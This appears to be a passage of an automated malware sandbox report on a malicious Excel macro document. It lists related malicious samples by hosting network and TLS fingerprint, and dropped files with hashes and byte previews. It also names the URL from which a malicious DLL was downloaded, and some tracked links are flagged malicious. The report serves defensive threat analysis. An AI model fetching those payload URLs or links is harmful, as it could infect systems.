	https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3D	Get hash	malicious	Browse	104.18.10.39
	https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3D	Get hash	malicious	Browse	104.18.10.39

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GD-EMEA-DC-SXB1DE	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse	80.86.91.27
	HkNkyKl3uT.dll	Get hash	malicious	Browse	80.86.91.27
	ceepq536n.zip.dll	Get hash	malicious	Browse	80.86.91.27
	sample20210111-01.xlsm	Get hash	malicious	Browse	80.86.91.27
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	80.86.91.27
	hiytvys.dll	Get hash	malicious	Browse	80.86.91.27
	l7rgi3xyd.dll	Get hash	malicious	Browse	80.86.91.27
	ymuyks.dll	Get hash	malicious	Browse	80.86.91.27
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	80.86.91.27
	hy9x6wzip.dll	Get hash	malicious	Browse	80.86.91.27
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	80.86.91.27
	jufk0vrar.dll	Get hash	malicious	Browse	80.86.91.27
	s3CRQNulKZ.exe	Get hash	malicious	Browse	217.172.179.54
	DFR2154747.vbe	Get hash	malicious	Browse	85.25.93.233
	r8a97.exe	Get hash	malicious	Browse	62.75.168.106
	NKsplucdAu.exe	Get hash	malicious	Browse	217.172.179.54
	lZVNh1BPxm.exe	Get hash	malicious	Browse	217.172.179.54
	qG5E4q8Cv5.exe	Get hash	malicious	Browse	217.172.179.54
	SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exe	Get hash	malicious	Browse	217.172.179.54
	990109.exe	Get hash	malicious	Browse	87.230.93.218
OVHFR	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse	46.105.131.65
	HkNkyKl3uT.dll	Get hash	malicious	Browse	46.105.131.65
	Doc_74657456348374.xlsx	Get hash	malicious	Browse	149.202.23.211
	ceepq536n.zip.dll	Get hash	malicious	Browse	46.105.131.65
	sample20210111-01.xlsm	Get hash	malicious	Browse	46.105.131.65
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	46.105.131.65
	sfk_setup.exe	Get hash	malicious	Browse	54.39.133.136
	hiytvys.dll	Get hash	malicious	Browse	46.105.131.65
	l7rgi3xyd.dll	Get hash	malicious	Browse	46.105.131.65
	ymuyks.dll	Get hash	malicious	Browse	46.105.131.65
	Client.vbs	Get hash	malicious	Browse	92.222.182.237
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	46.105.131.65
	hy9x6wzip.dll	Get hash	malicious	Browse	46.105.131.65
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	46.105.131.65
	jufk0vrar.dll	Get hash	malicious	Browse	46.105.131.65
	Pioneercon Project Contract.exe	Get hash	malicious	Browse	51.195.53.221
	Outstanding Payments.exe	Get hash	malicious	Browse	51.195.53.221
	Quw3X5oAwe.exe	Get hash	malicious	Browse	51.83.208.157
	H56P7iDwnJ.doc	Get hash	malicious	Browse	142.44.230.78
	11998704458248.exe	Get hash	malicious	Browse	54.37.160.157
SENTIANL	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse	5.100.228.233
	HkNkyKl3uT.dll	Get hash	malicious	Browse	5.100.228.233
	ceepq536n.zip.dll	Get hash	malicious	Browse	5.100.228.233
	sample20210111-01.xlsm	Get hash	malicious	Browse	5.100.228.233
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	5.100.228.233
	hiytvys.dll	Get hash	malicious	Browse	5.100.228.233
	l7rgi3xyd.dll	Get hash	malicious	Browse	5.100.228.233
	ymuyks.dll	Get hash	malicious	Browse	5.100.228.233
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	5.100.228.233
	hy9x6wzip.dll	Get hash	malicious	Browse	5.100.228.233
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	5.100.228.233
	jufk0vrar.dll	Get hash	malicious	Browse	5.100.228.233
	anthon.exe	Get hash	malicious	Browse	145.131.21.142
	baf6b9fcec491619b45c1dd7db56ad3d.exe	Get hash	malicious	Browse	91.216.141.46
	p8LV1eVFyO.exe	Get hash	malicious	Browse	91.216.141.46
	IQtvZjIdhN.exe	Get hash	malicious	Browse	91.216.141.46
	148wWoi8vI.exe	Get hash	malicious	Browse	91.216.141.46
	plusnew.exe	Get hash	malicious	Browse	145.131.29.142
	List-20200731-79226.doc	Get hash	malicious	Browse	5.100.228.16
	LIST-20200731-88494.doc	Get hash	malicious	Browse	5.100.228.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
eb88d0b3e1961a0562f006e5ce2a0b87	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse	77.220.64.37
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	77.220.64.37
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	77.220.64.37
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	77.220.64.37
	Document74269.xls	Get hash	malicious	Browse	77.220.64.37
	Document74269.xls	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xls	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1-Total New Invoices Monday Dec 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	SecuriteInfo.com.Heur.15645.xlsm	Get hash	malicious	Browse	77.220.64.37
	Statement_1857_of_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	Statement_9505_of_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	MSC printouts of outstanding as of 73221_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	Invoice.29002611.doc	Get hash	malicious	Browse	77.220.64.37
	MSC printouts of outstanding as of 64338_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	MSC printouts of outstanding as of 41705_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	7.367371959019618
Encrypted:	false
SSDEEP:	24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
MD5:	E4A68AC854AC5242460AFD72481B2A44
SHA1:	DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
SHA-256:	CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
SHA-512:	5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0...0..v........:......(d.....0....H........0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20...130801120000Z..380115120000Z0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20.."0....H.............0.........7.4.{k.h..Ju.F.!.....T......:..<z...k.-.^.$D.b.~..~.Tu ..P..c.l0.............7...CN.{,.../..:...%.k.`.`.O!I..g..a......2k..W.].......I.5-..Im.w..IK..U......#.LmE.....0..LU.'JW.\|...s...J...P.......!..........g(.s..=Fv...!4M..E..I.....3.).......B0@0...U.......0....0...U...........0...U......N"T ....n..........90....H.............`g(.o.Hc.1..g..}<.J...+.._sw2.9.gB.#.Eg5....a.4.. L....5.v..B..D...6t$Z.l..Y5..I....G=./.\... ._SF..h...0.>1.....>5.._..pPpGA.W.N......./.%.u...o..Aq...O. U...E..D..2...SF.,...".K..E....X..}R..YC....&.o....7}.....w_v.<..]V[..fn.57.2.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.089295105400412
Encrypted:	false
SSDEEP:	6:kK/HlpLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:XLLutWOxSW0zeYrsMlU/
MD5:	72E00E19442BB7E93F3908C071B130CB
SHA1:	BD328D24B74632C28AE692BF3EE16E620F12E0F1
SHA-256:	2010F1E5DFD83D2B6E4ED939379B7800E0C1AAACDE46A3FE52244972E24A5737
SHA-512:	B162C3372E391A0EF7EF67E392FCB0E1BE92420917161C79A766785DCE3987CA80334B288EC1A4DA48656F8727D7C7993B8C4CB0D2D501044F55AE8BA2419C4A
Malicious:	false
Reputation:	low
Preview:	p...... ....j.....C.....(....................................................... ............n...u..................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.G.l.o.b.a.l.R.o.o.t.G.2...c.r.t...".5.a.2.8.6.4.1.7.-.3.9.2."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.117051994467751
Encrypted:	false
SSDEEP:	6:kKSswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:8kPlE99SNxAhUegeT2
MD5:	DE36DFB311F1F1E1500F1441082AEF73
SHA1:	C18093F2820E8F102030DCED7F49169EA2558957
SHA-256:	D25B61CAA10245DB2AC75ABAC9515B8347DA50D43B20B7E7071E10FED426437A
SHA-512:	E73588F396B34CAC87C698EBB2129F7BFEF0ABDAB2750E15CDB54354CA869F035979F3A28573CB7E1779F162E03676D9751BE27C9886A6A6AFB9C0AF21E519DB
Malicious:	false
Reputation:	low
Preview:	p...... .........8C!....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	318976
Entropy (8bit):	7.120180422335748
Encrypted:	false
SSDEEP:	6144:/HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:vdO02Srnh0qEJC+Y218jdU
MD5:	8E5596083FD4C3134204E905F7F66325
SHA1:	6902210F93D3A940571CC860C4563CD4BE14EDB9
SHA-256:	8110E38AFD33797465AB43841B1C54ABFF7A25ACC30FA27C2623966750D34737
SHA-512:	E7084948B9F9BCB28F7C85A2812825D8012327BCFB5310F5759AEBD585504624682187F9A6AF86206295BFB4F1A9A178DC9322218B2E0A72E2CB3B8FCFB370E5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 38%
Reputation:	low
IE Cache URL:	http://truxiellogroup.com/d0l359.rar
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_...........!...2.z...`.......&.......@...............................@..........................................................\|....................0..P....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.F....p.......2..............@..@.data...`............4..............@....text4...R.......T...P.............. ..@.rsrc...\|........0..................@..@.reloc..P....0......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1182D45F.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1408
Entropy (8bit):	2.270567557934206
Encrypted:	false
SSDEEP:	12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
MD5:	40550DC2F9D56285FA529159B8F2C6A5
SHA1:	DD81D41D283D2881BEC77E00D773C7E8C0744DA3
SHA-256:	DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
SHA-512:	FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	....l................................... EMF........).......................`...1........................\|..F...........GDIC........L0.U......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C189A2D4.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 363 x 234, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2653
Entropy (8bit):	7.818766151665501
Encrypted:	false
SSDEEP:	48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x
MD5:	30D3FFA1E30B519FD9B1B839CC65C7BE
SHA1:	1EB0F0E160FF7440223A7FE46F08B503F03D3AFB
SHA-256:	89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC
SHA-512:	88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...k.........S.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.........KIK..................IDATx...b.0.E-......`.Y..~f.$.h...,..H..CLg.x<.h..k..k..k..k..k..k..k........:....$F...........E.....t.c?.~...q?.....!F....)<#$.l.......`..f.......;.......D]M.~..s.....h.}`.&{..X2.6.....s.;3>..o....0zn...])..8..;..rA..6..Xn"R..a.Bw..M....tw..mE.w....>....].._v...z...H.y..8{)Z...gu.C~.3...>]o..>_.F/....._7nt...c...n..lu..g..@......I...=.........?.9...."..Rc..b..lf.f..l.....#4...Fw.A{...&N.Z.'..2.;.?.h.\|..eZf..`..`..`..`......O..m.>n.-fS.........R...q.....F..D.....w...e..x.H.?.C........;.o!.)....@G..y..EY...5.>...'.}..4(..Aj)d.Pk....7vG........,G..RZ.#F...K.<.....'j...^r.(......"......FHN.D4.j.y..wJ_...H2.....lN....?.V?...z.K.......M..F... ..t...053..:..0.~.S-.30..'...Q..et..=...5.q.Ko..Y#...H.~...C..CLi.83..6_..B.DC..>?.]..fGo..X0}C.\|.@B..AJ.s.x...n..[.#WE....F.gv..i}..f}.....qG...G.O4....w6.x.L.J.......^._o:Za}..{.x.....F

C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_EXCEL.EXE_6f227b18f49da44a2d1889aa10939f535bdc_054eb55b\Report.wer Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	data
Category:	dropped
Size (bytes):	15586
Entropy (8bit):	3.712887681614445
Encrypted:	false
SSDEEP:	96:JMakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOB1rXm:xBKzFCEuhTlyZVaP+VaJq
MD5:	E2F871D534BE85A5D1D87962878F3CC8
SHA1:	D7C5349015944691DB5F68ECA1794D9FB460B12F
SHA-256:	C93D863E7911D1CE05577528D7C3239AC8C23640C87B494335774C6923CE53D3
SHA-512:	0F8AB684D460169E3D1607678D721487AC97758C99D59EC56A6D02B5C8B13E8AE7151201E87A569DDE00E51F3BA0992AE253C47879DA0A5757F86EF530D4AC95
Malicious:	false
Preview:	V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.4.9.1.8.2.4.5.1.6.8.5.4.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.4.9.1.8.2.6.1.9.5.4.1.7.1.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.d.a.b.1.2.b.-.5.4.b.a.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.d.a.b.1.2.a.-.5.4.b.a.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .N.a.m.e.....S.i.g.[.0.]...V.a.l.u.e.=.E.X.C.E.L...E.X.E.....S.i.g.[.1.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .V.e.r.s.i.o.n.....S.i.g.[.1.]...V.a.l.u.e.=.1.4...0...7.0.1.5...1.0.0.0.....S.i.g.[.2.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .T.i.m.e.s.t.a.m.p.....S.i.g.[.2.]...V.a.l.u.e.=.5.1.c.c.a.7.c.d.....S.i.g.[.3.]...N.a.m.e.=.F.a.u.l.t. .M.o.d.u.l.e. .N.a.m.e.....S.i.g.[.3.]...V.a.l.u.e.=.U.R.L.M.O.N...D.L.L.....S.i.g.[.4.]...N.a.m.e.=.F.a.u.l.

C:\Users\user\AppData\Local\Temp\7EEE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	58629
Entropy (8bit):	7.8593552280696395
Encrypted:	false
SSDEEP:	1536:hde8RzggbLmCf6646CIKjPeshJSt3LGssLNFqnf:hN1rmCM27US57+Gf
MD5:	A733BA7BF8D80EC5C888654C8142757F
SHA1:	E443C3DEF948214C13FDB42C403CD98C623597E6
SHA-256:	C32A32E0184B39E4D6859FA4EFF53E07482C97E7F6F701E7D6A4AC38FDE3650D
SHA-512:	45D679F714BC29FACADCEEA1254DEB4BAF3EED57B209D1089622B4ED8450028FF4B2007CE4D084685795B2742C7B97BC91C71303FF9AB788C29FDA362D9BD114
Malicious:	false
Preview:	...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......\|_;.....W>~......x..u.n.....+.....(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.\|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\996393.cvr Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	1392
Entropy (8bit):	3.146905721655599
Encrypted:	false
SSDEEP:	24:gll/3upGvshFO/uSd+EbzlUlHYql/CkY/HxLBXmmP82P+ddmJaqyYgYDzbq:gll/eO0Ondz6lHYxhHJG0p1Pq
MD5:	B511B97280F8902D8F205C460BAC3431
SHA1:	EFD15EE2CB86C5A3030E9E7FB527CAD7C2ACD81D
SHA-256:	5B536AC721BC40755710179C13FF94BF83266717FA6436EEE0DFA91D117C68F0
SHA-512:	B3C1766FAC22F556EE7975888074555F2A2A56D81783015B92685BC852745787D852A5338BA8BCA414891FDE201FC765B239E1F7AB3CE3BE05510E03BE06CF20
Malicious:	false
Preview:	MSQMx.......3..G................g..........................g....[..v................................................................................4c......EXCE....................................\|...5...g.......;.......\|...<...........A...........l...........................z.......................................H.......................\|...................................................................................9...............b...........N....................G..C...........F...........Q.......H...W.......\|'...........'..............................................................+...........0...........:...........;...........................................^...........^........................................ ......Z...:!..........n"...........".......'...".......'...".......'...".......'...".......'...".......'..7#..........?...........................e...H...................<...B...........D&../...................LG../.......................$...$...........D&..n370....LG..

C:\Users\user\AppData\Local\Temp\Cab6C4B.tmp Download File
Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	241332
Entropy (8bit):	4.206792199643493
Encrypted:	false
SSDEEP:	1536:cGQLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cRNNSk8DtKBrpb2vxrOpprf/nVq
MD5:	FA3D2E7DC0BD05B5AEDFE08FAB1F6CA1
SHA1:	3576B4581BFC16AADF82EE8334A3A5C9FA53208C
SHA-256:	B14E55289527C8ABD24B9982C570142B0463EB7AE1E96D1BD05ACDD71112560E
SHA-512:	A1CF22CE16BE9567984AC4987539452991851E80BD49D9040A5FEA7E87E68015BC728F7C4031FC35A28D53D6F2506625A3581FF01B773568FC33615DBB89EEE3
Malicious:	false
Preview:	MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................

